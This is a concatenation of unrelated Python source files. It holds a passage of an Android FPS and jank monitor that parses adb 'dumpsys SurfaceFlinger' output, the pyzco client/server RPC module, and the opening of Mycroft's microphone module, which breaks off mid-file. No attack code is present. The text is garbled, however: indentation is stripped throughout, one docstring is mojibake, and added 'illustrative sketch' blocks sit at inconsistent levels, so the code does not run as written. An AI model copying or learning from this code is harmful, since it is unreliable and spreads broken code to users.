if (index == 0) or (index == 1) or (index == 2) or (index == 3):
if tempstamp == 0:
tempstamp = timestamp[1]
continue
# draw time of this frame
costtime = timestamp[1] - tempstamp
# if the draw time exceeds the threshold (10 vsync periods), the user can perceive the jank
if costtime > self.jank_threshold:
jank = jank + 1
tempstamp = timestamp[1]
elif index > 3:
currentstamp = timestamps[index][1]
lastonestamp = timestamps[index - 1][1]
lasttwostamp = timestamps[index - 2][1]
lastthreestamp = timestamps[index - 3][1]
lastfourstamp = timestamps[index - 4][1]
tempframetime = ((lastthreestamp - lastfourstamp) + (lasttwostamp - lastthreestamp) + (
lastonestamp - lasttwostamp)) / 3 * 2
currentframetime = currentstamp - lastonestamp
if (currentframetime > tempframetime) and (currentframetime > twofilmstamp):
jank = jank + 1
return jank
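# Illustrative sketch (not part of the original module): the two-condition
# jank rule above applied to synthetic present times, reimplemented inline so
# it runs without a device or a collector instance.
@staticmethod
def _demo_jank_rule():
    twofilmstamp = 83.3 / 1000.0
    # five smooth ~16.6ms frames followed by one slow 100ms frame
    times = [0.0, 0.0166, 0.0333, 0.0500, 0.0666, 0.1666]
    jank = 0
    for i in range(4, len(times)):
        avg_frame_time = (times[i - 1] - times[i - 4]) / 3.0
        frame_time = times[i] - times[i - 1]
        # condition 1: slower than twice the average of the previous 3 frames
        # condition 2: slower than two movie frames (~83.3ms)
        if frame_time > 2 * avg_frame_time and frame_time > twofilmstamp:
            jank += 1
    return jank  # -> 1 (only the 100ms frame satisfies both conditions)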
def _calculate_janky(self,timestamps):
tempstamp = 0
# count dropped-frame janks
jank = 0
for timestamp in timestamps:
if tempstamp == 0:
tempstamp = timestamp[1]
continue
# draw time of this frame
costtime = timestamp[1] - tempstamp
# if the draw time exceeds the threshold (10 vsync periods), the user can perceive the jank
if costtime > self.jank_threshold:
jank = jank + 1
tempstamp = timestamp[1]
return jank
def _calculator_thread(self,start_time):
'''Process the SurfaceFlinger data
'''
fps_file = os.path.join(RuntimeData.package_save_path, 'fps.csv')
if self.use_legacy_method:
fps_title = ['datetime', 'fps']
else:
fps_title = ['datetime', "activity window", 'fps', 'jank']
try:
with open(fps_file, 'a+') as df:
csv.writer(df, lineterminator='\n').writerow(fps_title)
if self.fps_queue:
fps_file_dic = {'fps_file': fps_file}
self.fps_queue.put(fps_file_dic)
except RuntimeError as e:
logger.exception(e)
while True:
try:
data = self.data_queue.get()
if isinstance(data, str) and data == 'Stop':
break
before = time.time()
if self.use_legacy_method:
td = data['timestamp'] - self.surface_before['timestamp']
seconds = td.seconds + td.microseconds / 1e6
frame_count = (data['page_flip_count'] -
self.surface_before['page_flip_count'])
fps = int(round(frame_count / seconds))
if fps>60:
fps = 60
self.surface_before = data
logger.debug('FPS:%2s'%fps)
tmp_list = [TimeUtils.getCurrentTimeUnderline(),fps]
try:
with open(fps_file, 'a+',encoding="utf-8") as f:
# tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
else:
refresh_period = data[0]
timestamps = data[1]
collect_time = data[2]
# fps,jank = self._calculate_results(refresh_period, timestamps)
fps, jank = self._calculate_results_new(refresh_period, timestamps)
logger.debug('FPS:%2s Jank:%s'%(fps,jank))
fps_list=[collect_time,self.focus_window,fps,jank]
if self.fps_queue:
self.fps_queue.put(fps_list)
if not self.fps_queue: # save the data to file when the script runs standalone
try:
with open(fps_file, 'a+',encoding="utf-8") as f:
tmp_list = copy.deepcopy(fps_list)
tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _calculator_thread ,reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
def _collector_thread(self):
'''Collect the SurfaceFlinger data.
Two methods are used: when use_legacy_method is True (requires root),
"service call SurfaceFlinger 1013" is used to get the frame count;
when it is False, "dumpsys SurfaceFlinger --latency" is used.
On Android 8.0 "dumpsys SurfaceFlinger" returns no content, so
"dumpsys gfxinfo package_name framestats" is used instead.
'''
is_first = True
while not self.stop_event.is_set():
try:
before = time.time()
if self.use_legacy_method:
surface_state = self._get_surface_stats_legacy()
if surface_state:
self.data_queue.put(surface_state)
else:
timestamps = []
refresh_period, new_timestamps = self._get_surfaceflinger_frame_data()
if refresh_period is None or new_timestamps is None:
# the activity changed and the old activity no longer exists, so the returned timestamps are empty
self.focus_window = self.get_focus_activity()
logger.debug("refresh_period is None or timestamps is None")
continue
# keep only the frames that have not been counted yet
timestamps += [timestamp for timestamp in new_timestamps
if timestamp[1] > self.last_timestamp]
if len(timestamps):
first_timestamp = [[0, self.last_timestamp, 0]]
if not is_first:
timestamps = first_timestamp + timestamps
self.last_timestamp = timestamps[-1][1]
is_first = False
else:
# Two cases: 1) the activity changed but the old one still exists, so the
# returned timestamps are not empty yet all are less than or equal to last_timestamp;
# 2) the activity did not change and there was no refresh at all
is_first = True
cur_focus_window = self.get_focus_activity()
if self.focus_window != cur_focus_window:
self.focus_window = cur_focus_window
continue
logger.debug(timestamps)
self.data_queue.put((refresh_period, timestamps,time.time()))
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _collector_thread , reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
self.data_queue.put(u'Stop')
def _clear_surfaceflinger_latency_data(self):
"""Clears the SurfaceFlinger latency data.
Returns:
True if SurfaceFlinger latency is supported by the device, otherwise
False.
"""
# The command returns nothing if it is supported, otherwise returns many
# lines of result just like 'dumpsys SurfaceFlinger'.
if self.focus_window is None:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear')
else:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear %s' % self.focus_window)
return not len(results)
def _get_surfaceflinger_frame_data(self):
"""Returns collected SurfaceFlinger frame timing data.
return:(16.6,[[t1,t2,t3],[t4,t5,t6]])
Returns:
A tuple containing:
- The display's nominal refresh period in seconds.
- A list of timestamps signifying frame presentation times in seconds.
The return value may be (None, None) if there was no data collected (for
example, if the app was closed before the collector thread has finished).
"""
# shell dumpsys SurfaceFlinger --latency <window name>
# prints some information about the last 128 frames displayed in
# that window.
# The data returned looks like this:
# 16954612
# 7657467895508 7657482691352 7657493499756
# 7657484466553 7657499645964 7657511077881
# 7657500793457 7657516600576 7657527404785
# (...)
#
# The first line is the refresh period (here 16.95 ms), it is followed
# by 128 lines w/ 3 timestamps in nanosecond each:
# A) when the app started to draw
# B) the vsync immediately preceding SF submitting the frame to the h/w
# C) timestamp immediately after SF submitted that frame to the h/w
#
# The difference between the 1st and 3rd timestamp is the frame-latency.
# An interesting data is when the frame latency crosses a refresh period
# boundary, this can be calculated this way:
#
# ceil((C - A) / refresh-period)
#
# (each time the number above changes, we have a "jank").
# If this happens a lot during an animation, the animation appears
# janky, even if it runs at 60 fps in average.
#
# Google Pixel 2, Android 8.0: output of dumpsys SurfaceFlinger --latency
# 16666666
# 0 0 0
# 0 0 0
# 0 0 0
# 0 0 0
# On a Honor 9 (Android 8.0) the dumpsys SurfaceFlinger --latency output looks normal,
# but the data refreshes too slowly to be usable for computing fps either
# 16666666
# 9223372036854775807 3618832932780 9223372036854775807
# 9223372036854775807 3618849592155 9223372036854775807
# 9223372036854775807 3618866251530 9223372036854775807
# Google Pixel 2, Android 8.0: output of dumpsys SurfaceFlinger --latency <window>
# C:\Users\luke01>adb -s HT7B81A05143 shell dumpsys SurfaceFlinger --latency window_name
# 16666666
refresh_period = None
timestamps = []
nanoseconds_per_second = 1e9
pending_fence_timestamp = (1 << 63) - 1
""" ๅ ไธบๅไปฃ็ ไธญ่ฐ็จ็ umpsys gfxinfo packagename framestats ๅชไฝฟ็จไบ่ทๅapp็fpsๆฐๆฎ๏ผ่ไธไฝฟ็จไบๆธธๆ
่ไธ dumpsys SurfaceFlinger --latency %s'%self.focus_window ่ฟไธชๆไปค็ๅๆฐๆ่ฏฏ
ไนๆฒกๆ่ทๅๅๆฐ็ไปฃ็ ๏ผๅ ๆญค้ๅไบๆธธๆfps็ๆฐๆฎ่ทๅ้จๅไปฃ็
"""
# if self.device.adb.get_sdk_version() >= 26:
# results = self.device.adb.run_shell_cmd(
# 'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
# results = results.replace("\r\n","\n").splitlines()
# refresh_period = int(results[0]) / nanoseconds_per_second
# results = self.device.adb.run_shell_cmd('dumpsys gfxinfo %s framestats'%self.package_name)
# # logger.debug(results)
# # wrap the output of dumpsys gfxinfo package_name framestats into the
# # dumpsys SurfaceFlinger --latency format so fps/jank can be computed uniformly later
# results = results.replace("\r\n","\n").splitlines()
# if not len(results):
# return (None, None)
# isHaveFoundWindow = False
# PROFILEDATA_line = 0
# for line in results:
# if not isHaveFoundWindow:
# if "Window" in line and self.focus_window in line:
# isHaveFoundWindow = True
# # logger.debug("Window line:"+line)
# if not isHaveFoundWindow:
# continue
# if "PROFILEDATA" in line:
# PROFILEDATA_line +=1
# fields = []
# fields = line.split(",")
# if fields and '0' == fields[0]:
# # logger.debug(line)
# # get the INTENDED_VSYNC, VSYNC and FRAME_COMPLETED times; use VSYNC to compute fps and jank
# timestamp = [int(fields[1]),int(fields[2]),int(fields[13])]
# if timestamp[1] == pending_fence_timestamp:
# continue
# timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
# timestamps.append(timestamp)
# # stop once the next window section is reached
# if 2 == PROFILEDATA_line:
# break
# else:
# results = self.device.adb.run_shell_cmd(
# 'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
# results = results.replace("\r\n","\n").splitlines()
# logger.debug("dumpsys SurfaceFlinger --latency result:")
# logger.debug(results)
# if not len(results):
# return (None, None)
# if not results[0].isdigit():
# return (None, None)
# try:
# refresh_period = int(results[0]) / nanoseconds_per_second
# except Exception as e:
# logger.exception(e)
# return (None, None)
# # If a fence associated with a frame is still pending when we query the
# # latency data, SurfaceFlinger gives the frame a timestamp of INT64_MAX.
# # Since we only care about completed frames, we will ignore any timestamps
# # with this value.
# get the SurfaceView layer name
SurfaceView = self.device.adb.run_shell_cmd(
"dumpsys SurfaceFlinger --list | findstr " + self.focus_window)
# print(SurfaceView)
SurfaceView_info = None
SurfaceView = SurfaceView.replace("\r\n", "\n").splitlines()
# print(SurfaceView)
for line in SurfaceView:
print(line)
if "SurfaceView" in line:
SurfaceView_info = line
# print(line)
print('-------------------')
SurfaceView_name = "\"" + str(SurfaceView_info) + "\""
# if "\n" in SurfaceView_info:
surface_result = SurfaceView_name.replace('\n', '')
print(SurfaceView_name)
print(surface_result)
print('-----------------')
# The argument appended to this command is not the package or window name but
# the layer name obtained from the command above, e.g.:
# SurfaceView - com.hypergryph.arknights/com.u8.sdk.U8UnityContext@e0225d1@0[20991]#0
# With newer adb the quoting has to be applied twice to take effect,
# e.g. adb shell ""abcd"" - which is why the unquoted command returns only one line of data
results = self.device.adb.run_shell_cmd(
"dumpsys SurfaceFlinger --latency \'" + surface_result + "\'")
# results = self.device.adb.run_shell_cmd(
# 'dumpsys SurfaceFlinger --latency %s' % self.focus_window)
results = results.replace("\r\n", "\n").splitlines()
logger.debug("dumpsys SurfaceFlinger --latency result:")
logger.debug(results)
if not len(results):
return (None, None)
if not results[0].isdigit():
return (None, None)
try:
refresh_period = int(results[0]) / nanoseconds_per_second
except Exception as e:
logger.exception(e)
return (None, None)
for line in results[1:]:
fields = line.split()
if len(fields) != 3:
continue
timestamp = [int(fields[0]),int(fields[1]),int(fields[2])]
if timestamp[1] == pending_fence_timestamp:
continue
timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
timestamps.append(timestamp)
return (refresh_period, timestamps)
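# Illustrative sketch (not part of the original module): parsing a canned
# "dumpsys SurfaceFlinger --latency" output the way the method above does, so
# the format can be checked without a device. The numbers are made up.
@staticmethod
def _demo_parse_latency_output():
    sample = ("16666666\n"
              "7657467895508 7657482691352 7657493499756\n"
              "7657484466553 9223372036854775807 7657511077881\n")
    nanoseconds_per_second = 1e9
    pending_fence_timestamp = (1 << 63) - 1
    lines = sample.splitlines()
    refresh_period = int(lines[0]) / nanoseconds_per_second   # ~0.0167 s
    timestamps = []
    for line in lines[1:]:
        fields = line.split()
        if len(fields) != 3:
            continue
        triple = [int(f) for f in fields]
        if triple[1] == pending_fence_timestamp:
            continue        # frame fence still pending, skip it
        timestamps.append([t / nanoseconds_per_second for t in triple])
    return refresh_period, timestamps   # only the first data line survives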
def _get_surface_stats_legacy(self):
"""Legacy method (before JellyBean), returns the current Surface index
and timestamp.
Calculate FPS by measuring the difference of Surface index returned by
SurfaceFlinger in a period of time.
Returns:
Dict of {page_flip_count (or 0 if there was an error), timestamp}.
"""
cur_surface = None
timestamp = datetime.datetime.now()
# this command may require root
ret = self.device.adb.run_shell_cmd("service call SurfaceFlinger 1013")
if not ret :
return None
match = re.search(r'^Result: Parcel\((\w+)', ret)
if match :
cur_surface = int(match.group(1), 16)
return {'page_flip_count': cur_surface,'timestamp': timestamp}
return None
class FPSMonitor(Monitor):
'''FPS monitor'''
def __init__(self, device_id, package_name = None,frequency=1.0,timeout =24 * 60 * 60,fps_queue=None,jank_threshold=166, use_legacy = False):
'''Constructor
:param str device_id: device id
:param float frequency: frame-rate sampling interval, default 1 second
:param int jank_threshold: threshold for counting a jank, in milliseconds; default is 10 vsync periods (166ms)
:param bool use_legacy: when True, always use page_flip to compute the frame rate, which reflects the full-screen refresh rate;
when not set, on systems 4.1 and above the refresh rate of the currently focused Activity is measured
'''
self.use_legacy = use_legacy
self.frequency = frequency # sampling frequency
self.jank_threshold = jank_threshold
self.device = AndroidDevice(device_id)
self.timeout = timeout
if not package_name:
package_name = self.device.adb.get_foreground_process()
self.package = package_name
self.fpscollector = SurfaceStatsCollector(self.device, self.frequency, package_name,fps_queue,self.jank_threshold, self.use_legacy)
def start(self,start_time):
'''Start the FPSMonitor
'''
if not RuntimeData.package_save_path:
RuntimeData.package_save_path = os.path.join(os.path.abspath(os.path.join(os.getcwd(), "../..")),'results', self.package, start_time)
if not os.path.exists(RuntimeData.package_save_path):
os.makedirs(RuntimeData.package_save_path)
self.start_time = start_time
self.fpscollector.start(start_time)
logger.debug('FPS monitor has started!')
def stop(self):
'''Stop the FPSMonitor
'''
self.fpscollector.stop()
logger.debug('FPS monitor has stopped!')
def save(self):
pass
def parse(self, file_path):
'''Parse
:param str file_path: path of the data file to parse
'''
pass
def get_fps_collector(self):
'''Get the fps collector; the collector stores the list of (time, fps, jank)
:return: the fps collector
:rtype: SurfaceStatsCollector
'''
return self.fpscollector
if __name__ == '__main__':
# tulanduo android8.0 api level 27
monitor = FPSMonitor('TC79SSDMO7HEY5Z9',"com.alibaba.ailabs.genie.smartapp",1)
# mate 9 android8.0
# monitor = FPSMonitor('MKJNW18226007860',"com.sankuai.meituan",2)
# android8.0 Google Pixel 2
# monitor = FPSMonitor('HT7B81A05143',package_name = "com.alibaba.ailibs.genie.contacts",1)
monitor.start(TimeUtils.getCurrentTimeUnderline())
time.sleep(600)
monitor.stop()
|
clientserver.py | # -*- coding: utf-8 -*-
"""
pyzco.clientserver
~~~~~~~~~~~~~~~~~~
Implements Client and Server agents.
:copyright: 2013 by Hernan E. Grecco, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import inspect
import threading
import traceback
from collections import defaultdict
from . import LOGGER, launch
from .util import Signal
from .agent import Agent
if sys.version_info < (3, 2):
import futures
else:
from concurrent import futures
HIDE_TRACEBACK = os.environ.get('PZC_HIDE_TRACEBACK', True)
class RemoteAttribute(object):
"""Representing a remote attribute that can handle
callables, container types, descriptors and signals.
:param request: a callable used to send the request to the server, taking two arguments: action and payload.
:param name: name of the attribute.
:param signal_manager:
"""
def __init__(self, name, request, signal_manager):
self.name = name
self.request = request
self.signal_manager = signal_manager
def __get__(self, key):
return self.request('exec', {'name': self.name,
'method': '__get__',
'args': (key, )})
def __set__(self, key, value):
return self.request('exec', {'name': self.name,
'method': '__set__',
'args': (key, value)})
def __getitem__(self, key):
return self.request('exec', {'name': self.name,
'method': '__getitem__',
'args': (key,)})
def __setitem__(self, key, value):
return self.request('exec', {'name': self.name,
'method': '__setitem__',
'args': (key, value)})
def __call__(self, *args, **kwargs):
payload = {'name': self.name, 'method': '__call__'}
if args:
payload['args'] = args
if kwargs:
payload['kwargs'] = kwargs
return self.request('exec', payload)
def connect(self, fun):
LOGGER.debug('Connecting {} to {}'.format(self.name, fun))
self.signal_manager('connect', self.name, fun)
def disconnect(self, fun):
self.signal_manager('disconnect', self.name, fun)
def emit(self, value, old_value, other):
self.signal_manager('emit', self.name, (value, old_value, other))
def PSMessage(action, options):
"""Builds a message
"""
return 'PSMessage', action, options
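# Illustrative sketch (not part of the original module): the tuple shapes
# PSMessage produces on the wire; the attribute name 'motor' is made up.
def _demo_psmessage_shapes():
    # Proxy -> Server: call served_object.motor(10)
    request = PSMessage('exec', {'name': 'motor', 'method': '__call__', 'args': (10,)})
    # Server -> Proxy: plain return value
    reply = PSMessage('return', 42)
    # both are plain ('PSMessage', action, options) tuples
    assert request[0] == reply[0] == 'PSMessage'
    return request, reply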
class Server(Agent):
"""Serves an object for remote access from a Proxy. A Server can serve a single object.
:param served_object: object to be served.
.. seealso:: :class:`.Agent`
.. seealso:: :class:`.Proxy`
"""
def __init__(self, served_object, rep_endpoint='tcp://127.0.0.1:0', pub_endpoint='tcp://127.0.0.1:0',
ctx=None, loop=None):
self.served_object = served_object
self.signal_calls = {}
super(Server, self).__init__(rep_endpoint, pub_endpoint, ctx, loop)
def on_request(self, sender, topic, content, msgid):
"""Handles Proxy Server communication, handling attribute access in served_object.
Messages between proxy and server are handled using a tuple
containing three elements: a string 'PSMessage', `action` and `options`.
From Proxy to Server, valid actions are:
- `exec`: execute a method from an attribute served object.
- `getattr`: get an attribute from the served object.
- `setattr`: set an attribute to the served object.
- `get`: get an attribute from the served object, returning a remote object
when necessary.
From Server to Proxy, valid actions are:
- `return`: return a value.
- `remote`: return a RemoteAttribute object.
- `raise`: raise an exception.
"""
try:
content_type, action, options = content
if content_type != 'PSMessage':
raise ValueError()
except:
return super(Server, self).on_request(
sender, topic, content, msgid)
try:
if action == 'exec':
attr = getattr(self.served_object, options['name'])
meth = getattr(attr, options['method'])
ret = meth(*options.get('args', ()),
**options.get('kwargs', {}))
elif action == 'getattr':
ret = getattr(self.served_object, options['name'])
elif action == 'setattr':
setattr(self.served_object, options['name'], options['value'])
return PSMessage('return', None)
elif action == 'get':
attr = getattr(self.served_object, options['name'])
if options.get('force_as_object', False) or self.force_as_object(attr):
ret = attr
elif self.return_as_remote(attr):
return PSMessage('remote', None)
else:
ret = attr
elif action == 'inspect':
return PSMessage('return', self.inspect())
elif action == 'instantiate':
if self.served_object is not None:
return PSMessage('raise', (Exception('Cannot instantiate another object.'),
''))
mod_name, class_name = options['class'].rsplit('.', 1)
mod = __import__(mod_name, fromlist=[class_name])
klass = getattr(mod, class_name)
self.served_object = klass(*options['args'], **options['kwargs'])
return PSMessage('return', None)
else:
ret = Exception('invalid message action {}'.format(action))
return PSMessage('raise', (ret, ''))
if isinstance(ret, futures.Future):
ret.add_done_callback(lambda fut: self.publish('__future__',
{'msgid': msgid,
'result': fut.result() if not fut.exception() else None,
'exception': fut.exception()}))
return PSMessage('future_register', msgid)
return PSMessage('return', ret)
except Exception as ex:
exc_type, exc_value, exc_tb = sys.exc_info()
tb = traceback.format_exception(exc_type, exc_value, exc_tb)[1:]
return PSMessage('raise', (ex, tb))
def emit(self, topic, value, old_value, other):
LOGGER.debug('Emitting {}, {}, {}, {}'.format(topic, value, old_value, other))
self.publish(topic, (value, old_value, other))
def on_subscribe(self, topic, count):
try:
signal = getattr(self.served_object, topic)
except AttributeError:
return
if count == 1:
LOGGER.debug('Connecting {} signal on server'.format(topic))
def fun(value, old_value=None, other=None):
LOGGER.debug('ready to emit')
self.emit(topic, value, old_value, other)
self.signal_calls[topic] = fun
signal.connect(self.signal_calls[topic])
def on_unsubscribe(self, topic, count):
try:
signal = getattr(self.served_object, topic)
except AttributeError:
return
if count == 0:
LOGGER.debug('Disconnecting {} signal on server'.format(topic))
signal.disconnect(self.signal_calls[topic])
del self.signal_calls[topic]
@classmethod
def serve_in_thread(cls, served_cls, args, kwargs,
rep_endpoint, pub_endpoint='tcp://127.0.0.1:0'):
t = threading.Thread(target=cls, args=(None, rep_endpoint, pub_endpoint))
t.start()
proxy = Proxy(rep_endpoint)
proxy._proxy_agent.instantiate(served_cls, args, kwargs)
return proxy
@classmethod
def serve_in_process(cls, served_cls, args, kwargs,
rep_endpoint, pub_endpoint='tcp://127.0.0.1:0',
verbose=False, gui=False):
cwd = os.path.dirname(inspect.getfile(served_cls))
launch(cwd, rep_endpoint, pub_endpoint, verbose, gui)
import time
time.sleep(1)
proxy = Proxy(rep_endpoint)
proxy._proxy_agent.instantiate(served_cls, args, kwargs)
return proxy
def serve_forever(self):
self.join()
LOGGER.debug('Server stopped')
def return_as_remote(self, attr):
"""Return True if the object must be returned as a RemoteAttribute.
Override this function to customize your server.
"""
return (hasattr(attr, '__get__') or
hasattr(attr, '__getitem__') or
hasattr(attr, '__setitem__') or
callable(attr) or
(hasattr(attr, 'connect') and hasattr(attr, 'disconnect') and hasattr(attr, 'emit')) )
def force_as_object(self, attr):
"""Return True if the object must be returned as object even if it meets the conditions of a RemoteAttribute.
Override this function to customize your server.
"""
return False
def inspect(self):
"""Inspect the served object and return a tuple containing::
- a set with the attributes that should be returned as RemoteAttribute.
- a set with the attributes that should be returned as Objects.
Override this function to customize your server.
.. seealso: return_as_remote, force_as_object
"""
remotes = set([name for name, value in inspect.getmembers(self.served_object)
if not name.startswith('_') and self.return_as_remote(value)])
objects = set([name for name, value in inspect.getmembers(self.served_object)
if not name.startswith('_') and self.force_as_object(value)])
return remotes, objects
class ProxyAgent(Agent):
"""Helper class that handles Proxy to Server communication.
:param remote_rep_endpoint: REP endpoint of the Server.
"""
def __init__(self, remote_rep_endpoint):
super(ProxyAgent, self).__init__()
self.remote_rep_endpoint = remote_rep_endpoint
ret = self.request(self.remote_rep_endpoint, 'info')
self.remote_pub_endpoint = ret['pub_endpoint']
LOGGER.debug('Started Proxy pointing to REP: {} and PUB: {}'.format(self.remote_rep_endpoint, self.remote_pub_endpoint))
self._signals = defaultdict(Signal)
#: Maps msgid to future object.
self._futures = {}
#: Subscribe to notifications when a future is finished.
self.subscribe(self.remote_rep_endpoint, '__future__',
self.on_future_completed, self.remote_pub_endpoint)
def request_server(self, action, options, force_as_object=False):
"""Sends a request to the associated server using PSMessage
:param action: action to be sent.
:param options: options of the action.
:return:
"""
if force_as_object:
options['force_as_object'] = True
content = self.request(self.remote_rep_endpoint, PSMessage(action, options))
try:
ret_type, ret_action, ret_options = content
if ret_type != 'PSMessage':
raise ValueError
except:
raise ValueError('Invalid response from Server {}'.format(content))
if ret_action == 'raise':
exc, traceback_text = ret_options
exc._pzc_traceback = traceback_text
raise exc
elif ret_action == 'remote':
return RemoteAttribute(options['name'], self.request_server, self.signal_manager)
elif ret_action == 'return':
return ret_options
elif ret_action == 'future_register':
fut = futures.Future()
fut.set_running_or_notify_cancel()
self._futures[ret_options] = fut
return fut
else:
raise ValueError('Unknown {}'.format(ret_action))
def signal_manager(self, action, signal_name, fun):
if action == 'connect':
if not self._signals[(self.remote_rep_endpoint, signal_name)].slots:
self.subscribe(self.remote_rep_endpoint, signal_name, None, self.remote_pub_endpoint)
self._signals[(self.remote_rep_endpoint, signal_name)].connect(fun)
elif action == 'disconnect':
self._signals[(self.remote_rep_endpoint, signal_name)].disconnect(fun)
if not self._signals[(self.remote_rep_endpoint, signal_name)].slots:
self.unsubscribe(self.remote_rep_endpoint, signal_name, self.remote_pub_endpoint)
elif action == 'emit':
#TODO: Emit signal in the server!
pass
else:
raise ValueError(action)
def on_future_completed(self, sender, topic, content, msgid):
fut = self._futures[content['msgid']]
if content['exception']:
fut.set_exception(content['exception'])
else:
fut.set_result(content['result'])
def on_notification(self, sender, topic, content, msgid):
try:
self._signals[(sender, topic)].emit(*content)
except KeyError:
super(ProxyAgent, self).on_notification(
sender, topic, content, msgid)
def instantiate(self, served_cls, args, kwargs):
if not isinstance(served_cls, str):
served_cls = served_cls.__module__ + '.' + served_cls.__name__
self.request_server('instantiate', {'class': served_cls, 'args': args, 'kwargs': kwargs})
def _except_hook(type, value, tb):
for item in traceback.format_exception(type, value, tb)[:-1] + getattr(value, '_pzc_traceback', []):
if HIDE_TRACEBACK and 'pizco.py' in item:
continue
sys.stderr.write(item)
def set_excepthook():
sys.excepthook = _except_hook
class Proxy(object):
"""Proxy object to access a server.
:param remote_endpoint: endpoint of the server.
"""
def __init__(self, remote_endpoint):
self._proxy_agent = ProxyAgent(remote_endpoint)
self._proxy_attr_as_remote, self._proxy_attr_as_object = self._proxy_agent.request_server('inspect', {})
def __getattr__(self, item):
if item.startswith('_proxy_'):
return super(Proxy, self).__getattr__(item)
if item in self._proxy_attr_as_remote:
return RemoteAttribute(item, self._proxy_agent.request_server, self._proxy_agent.signal_manager)
return self._proxy_agent.request_server('get', {'name': item}, item in self._proxy_attr_as_object)
def __setattr__(self, item, value):
if item.startswith('_proxy_'):
super(Proxy, self).__setattr__(item, value)
return
return self._proxy_agent.request_server('setattr', {'name': item, 'value': value})
def _proxy_stop_server(self):
self._proxy_agent.request(self._proxy_agent.remote_rep_endpoint, 'stop')
def _proxy_stop_me(self):
self._proxy_agent.stop()
def __del__(self):
self._proxy_agent.stop()
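# Illustrative usage sketch (not part of the original module): serve an object
# in a background thread and drive it through a Proxy. The class and endpoint
# below are made up, and nothing here is executed at import time.
class _DemoMotor(object):
    def move(self, steps):
        return steps

def _demo_proxy_roundtrip():
    proxy = Server.serve_in_thread(_DemoMotor, (), {}, 'tcp://127.0.0.1:9000')
    result = proxy.move(10)       # resolved remotely via an 'exec' PSMessage
    proxy._proxy_stop_server()    # ask the server to stop
    proxy._proxy_stop_me()        # stop the local proxy agent
    return result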
|
mic.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import audioop
from time import sleep, time as get_time
from collections import deque, namedtuple
import datetime
import json
import os
from os.path import isdir, join
import pyaudio
import requests
import speech_recognition
from hashlib import md5
from io import BytesIO, StringIO
from speech_recognition import (
Microphone,
AudioSource,
AudioData
)
from tempfile import gettempdir
from threading import Thread, Lock
from mycroft.api import DeviceApi
from mycroft.configuration import Configuration
from mycroft.session import SessionManager
from mycroft.util import (
check_for_signal,
get_ipc_directory,
resolve_resource_file,
play_wav
)
from mycroft.util.log import LOG
from .data_structures import RollingMean, CyclicAudioBuffer
# Let's see if we can dump DOA on the bus using hid - already added to requirement/requirements.txt
#Commenting this out for now since I can't get it to connect
#import hid # https://pypi.python.org/pypi/hidapi aka https://github.com/trezor/cython-hidapi
WakeWordData = namedtuple('WakeWordData',
['audio', 'found', 'stopped', 'end_audio'])
class MutableStream:
def __init__(self, wrapped_stream, format, muted=False):
assert wrapped_stream is not None
self.wrapped_stream = wrapped_stream
self.SAMPLE_WIDTH = pyaudio.get_sample_size(format)
self.muted_buffer = b''.join([b'\x00' * self.SAMPLE_WIDTH])
self.read_lock = Lock()
self.muted = muted
if muted:
self.mute()
def mute(self):
"""Stop the stream and set the muted flag."""
with self.read_lock:
self.muted = True
self.wrapped_stream.stop_stream()
def unmute(self):
"""Start the stream and clear the muted flag."""
with self.read_lock:
self.muted = False
self.wrapped_stream.start_stream()
def read(self, size, of_exc=False):
"""Read data from stream.
Args:
size (int): Number of bytes to read
of_exc (bool): flag determining if the audio producer thread
should throw IOError at overflows.
Returns:
(bytes) Data read from device
"""
frames = deque()
remaining = size
with self.read_lock:
while remaining > 0:
# If muted during read return empty buffer. This ensures no
# reads occur while the stream is stopped
if self.muted:
return self.muted_buffer
to_read = min(self.wrapped_stream.get_read_available(),
remaining)
if to_read <= 0:
sleep(.01)
continue
result = self.wrapped_stream.read(to_read,
exception_on_overflow=of_exc)
frames.append(result)
remaining -= to_read
input_latency = self.wrapped_stream.get_input_latency()
if input_latency > 0.2:
LOG.warning("High input latency: %f" % input_latency)
audio = b"".join(list(frames))
return audio
def close(self):
self.wrapped_stream.close()
self.wrapped_stream = None
def is_stopped(self):
try:
return self.wrapped_stream.is_stopped()
except Exception as e:
LOG.error(repr(e))
return True # Assume the stream has been closed and thus stopped
def stop_stream(self):
return self.wrapped_stream.stop_stream()
class MutableMicrophone(Microphone):
def __init__(self, device_index=None, sample_rate=16000, chunk_size=1024,
mute=False):
Microphone.__init__(self, device_index=device_index,
sample_rate=sample_rate, chunk_size=chunk_size)
self.muted = False
if mute:
self.mute()
def __enter__(self):
return self._start()
def _start(self):
"""Open the selected device and setup the stream."""
assert self.stream is None, \
"This audio source is already inside a context manager"
self.audio = pyaudio.PyAudio()
self.stream = MutableStream(self.audio.open(
input_device_index=self.device_index, channels=1,
format=self.format, rate=self.SAMPLE_RATE,
frames_per_buffer=self.CHUNK,
input=True, # stream is an input stream
), self.format, self.muted)
return self
